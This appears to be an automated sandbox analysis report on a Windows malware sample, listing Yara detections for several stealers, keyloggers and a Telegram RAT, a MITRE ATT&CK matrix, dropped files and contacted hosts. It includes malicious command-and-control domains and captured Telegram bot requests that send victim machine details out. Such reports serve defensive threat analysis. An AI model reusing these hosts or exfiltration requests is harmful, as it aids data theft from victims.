Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	341 Security Software Discovery	VNC	GUI Input Capture	124 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
image.exe	16%	ReversingLabs
image.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\Public\Libraries\Pumyophn.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Pumyophn.PIF	16%	ReversingLabs
C:\Users\Public\Libraries\nhpoymuP.pif	3%	ReversingLabs

Source	Detection	Scanner	Label
https://fodoknotel.za.com:443/233_Pumyophnrerhv	0%	Avira URL Cloud	safe
http://checkip.dyndnL	0%	Avira URL Cloud	safe
https://fodoknotel.za.com/233_Pumyophnre	0%	Avira URL Cloud	safe
https://fodoknotel.za.com/233_Pumyophnrer	0%	Avira URL Cloud	safe
http://mail.techniqueqatar.com	0%	Avira URL Cloud	safe
https://fodoknotel.za.com/d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fodoknotel.za.com	23.237.26.135	true	true	unknown
reallyfreegeoip.org	188.114.97.3	true	false	high
mail.techniqueqatar.com	208.91.198.176	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high
https://fodoknotel.za.com/233_Pumyophnrer	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2004:14:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2003/01/2025%20/%2001:16:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
